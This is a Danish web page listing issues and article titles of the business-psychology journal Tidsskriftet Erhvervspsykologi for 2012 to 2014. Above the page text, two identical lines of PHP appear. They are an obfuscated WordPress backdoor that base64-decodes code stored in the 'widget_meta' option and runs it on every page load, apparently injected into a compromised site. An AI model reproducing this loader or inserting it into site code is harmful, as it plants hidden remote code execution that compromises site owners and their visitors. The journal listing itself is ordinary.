add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Tidsskriftet Erhvervspsykologi - procespsykologi

Tidsskriftet Erhvervspsykologi

Erhvervspsykologisk Tidsskrift henvender sig til ledere, konsulenter og andre der arbejder med organisatoriske processer. Tidskriftet udkommer fire gange om året, og her er 2 numre åbne numre og 2 numre afsat til temanumre:

 • 4/2012: Læringsspil i Organisationsudvikling
 • 2/2013: Virtuel Distanceledelse
 • 4/2013: Organisatorisk Læring
 • 2/2014: Offentlig Ledelse (se call for papers med deadline d. 31. januar 2014 her)

 
Nedenfor kan du se eksempler på enkeltnumre. Du kan også bladre i arkivet her.
 
Back issues frem til 2009 kan frit hentes hos AAUs boghandler, Frederikskajen 10a, 2450 København SV.
 
 


et-2013-vol11-nr1_250

Volume 11 – nummer 1 – marts 2013

 • DEKONSTRUKTION I GRUPPER. Nyt narrativt kort til konsultation i organisationer
  Af Morten Novrup Henriksen og Thomas Lundby
 • KUNSTNEREN OG HÅNDVÆRKEREN
  Af Line Fredens
 • TAG IRONIEN MED PÅ ARBEJDE
  Af Anders Ingemann Larsen og Bjarne Frøslee Ibsen
 • ET DYNAMISK OG SAMSKABENDE TALENTUDVIKLINGSPROGRAM
  Af Palle Isbrandt, Mads Krarup og Kirstine Buch Poulsen
 • ACTION LEARNING CONSULTING. Organisationsudvikling i krydsfeltet imellem proceskonsultation og managementkonsultation
  Af Thorkil Molly-Søholm


et-2013-vol11-nr2_250p

Volume 11 – nummer 2 – juni 2013.
Tema: Virtuel distanceledelse

Artiklerne i dette nummer handler om forskellige aspekter ved virtuelt samarbejde, ledelse og kommunikation. Centralt for artiklerne er en udforskning af, hvad virtuel distance betyder for vores samarbejdsrelationer, og hvordan man som leder håndtere dette.

 • BULLETINER FRA KANTEN AF DEN NYE VIRKELIGHED.
  Editorial
 • KOMMUNIKATION PÅ DISTANCE. Virtuel ledelse – nye kompetencekrav til fremtidens ledere.
  Af Thea Ballerup-Jensen
 • DEN VIRTUELLE KAFFEPAUSE. Virtuel ledelse – hvordan skabe tillid og relationer på afstand?
  Af Mads Schramm
 • VIRTUEL LEDELSE – teknologiske problemer, sprogvanskeligheder og tidszone-forskelle i virtuelle teams.
  Af Rikke Lindekilde og Anders Klitmøller
 • FAKTASHARE: Sociale platforme som katalysatorer til medarbejderdrevet innovation.
  Af Jens Romundstad


et-2013-vol11-nr3_250p

Volume 11 – nummer 3 – oktober 2013.

 • NYE TIDER I TIDSSKRIFTET ERHVERVSPSYKOLOGI.
  Editorial af Thomas Duus Henriksen
 • KONGER OG DRONNINGER, TROLDE OG HEKSE, VINDERE OG TABERE OG ANDRE ROLLER PÅ ARBEJDSPLADSEN.
  Af Jørgen Filtenborg
 • NEUROAFFEKTIV COACHING. Forandring i hjernens nærmeste udviklingszone.
  Af Inge Holm
 • MENINGER OM MENINGER – LEDELSE AF DIGITALE INDFØDTE.
  Af Søren Schultz Hansen og Janne Skakon
 • ETIK KAN FORBINDE DEN INDIVIDUELLE IDENTITET MED ORGANISATIONENS IDENTITET.
  Af Mette Madsen
 • HINANDEN! – Et kritisk blik på herskende anvendelser af begrebet anerkendelse.
  Af Klaus Bakdal